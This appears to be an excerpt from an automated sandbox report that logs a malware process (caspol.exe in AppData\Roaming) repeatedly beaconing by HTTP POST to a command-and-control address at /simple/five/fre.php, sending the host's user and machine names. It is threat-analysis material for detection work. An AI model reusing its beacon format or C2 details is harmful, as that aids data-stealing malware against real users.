Nov 20, 2024 07:57:43.680879116 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.41
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A6A8C306
    Content-Length: 149
    Connection: close
Nov 20, 2024 07:57:43.687015057 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:44.541507006 CET | 193 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Wed, 20 Nov 2024 06:57:44 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    48 | 192.168.2.22 | 49217 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:44.681811094 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:44.686743021 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:45.533421993 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:45 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    49 | 192.168.2.22 | 49218 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:45.678222895 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:45.683161974 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:46.391887903 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:46 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    50 | 192.168.2.22 | 49219 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:46.567030907 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:46.572052002 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:47.435107946 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:47 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    51 | 192.168.2.22 | 49220 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:47.620480061 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:47.625431061 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:48.350254059 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:48 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    52 | 192.168.2.22 | 49221 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:48.532846928 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:48.537909031 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:49.387171030 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:49 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    53 | 192.168.2.22 | 49222 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:49.532310009 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:49.537252903 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:50.396709919 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:50 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    54 | 192.168.2.22 | 49223 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:50.536369085 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:50.541403055 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:51.399991989 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:51 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    55 | 192.168.2.22 | 49224 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:51.545281887 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:51.550184965 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:52.414423943 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:52 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    56 | 192.168.2.22 | 49225 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:52.566518068 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:52.571474075 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:53.412801027 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:53 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    57 | 192.168.2.22 | 49226 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:53.560519934 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:53.565464020 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:54.297231913 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:54 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    58 | 192.168.2.22 | 49227 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:54.453720093 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:54.459147930 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:55.163341045 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:55 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    59 | 192.168.2.22 | 49228 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:55.311486006 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:55.316399097 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:56.037281036 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:55 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
60          192.168.2.22  49229        94.156.177.41   80                2596  C:\Users\user\AppData\Roaming\caspol.exe

Timestamp: Nov 20, 2024 07:57:56.186849117 CET  Bytes transferred: 245  Direction: OUT
Data:
POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close

Timestamp: Nov 20, 2024 07:57:56.191792965 CET  Bytes transferred: 149  Direction: OUT
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3

Timestamp: Nov 20, 2024 07:57:56.912216902 CET  Bytes transferred: 193  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
61          192.168.2.22  49230        94.156.177.41   80                2596  C:\Users\user\AppData\Roaming\caspol.exe

Timestamp: Nov 20, 2024 07:57:57.051752090 CET  Bytes transferred: 245  Direction: OUT
Data:
POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close

Timestamp: Nov 20, 2024 07:57:57.056886911 CET  Bytes transferred: 149  Direction: OUT
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3

Timestamp: Nov 20, 2024 07:57:57.913125992 CET  Bytes transferred: 193  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
62          192.168.2.22  49231        94.156.177.41   80                2596  C:\Users\user\AppData\Roaming\caspol.exe

Timestamp: Nov 20, 2024 07:57:58.058877945 CET  Bytes transferred: 245  Direction: OUT
Data:
POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close

Timestamp: Nov 20, 2024 07:57:58.063832045 CET  Bytes transferred: 149  Direction: OUT
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3

Timestamp: Nov 20, 2024 07:57:58.906354904 CET  Bytes transferred: 193  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:58 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
63          192.168.2.22  49232        94.156.177.41   80                2596  C:\Users\user\AppData\Roaming\caspol.exe

Timestamp: Nov 20, 2024 07:57:59.309000969 CET  Bytes transferred: 245  Direction: OUT
Data:
POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close

Timestamp: Nov 20, 2024 07:57:59.315018892 CET  Bytes transferred: 149  Direction: OUT
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3

Timestamp: Nov 20, 2024 07:58:00.178472996 CET  Bytes transferred: 193  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:00 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
64          192.168.2.22  49233        94.156.177.41   80                2596  C:\Users\user\AppData\Roaming\caspol.exe

Timestamp: Nov 20, 2024 07:58:00.401304960 CET  Bytes transferred: 245  Direction: OUT
Data:
POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close

Timestamp: Nov 20, 2024 07:58:00.406323910 CET  Bytes transferred: 149  Direction: OUT
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3

Timestamp: Nov 20, 2024 07:58:01.249268055 CET  Bytes transferred: 193  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
65          192.168.2.22  49234        94.156.177.41   80                2596  C:\Users\user\AppData\Roaming\caspol.exe

Timestamp: Nov 20, 2024 07:58:01.397597075 CET  Bytes transferred: 245  Direction: OUT
Data:
POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close

Timestamp: Nov 20, 2024 07:58:01.402549982 CET  Bytes transferred: 149  Direction: OUT
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3

Timestamp: Nov 20, 2024 07:58:02.252270937 CET  Bytes transferred: 193  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:58:02 GMT
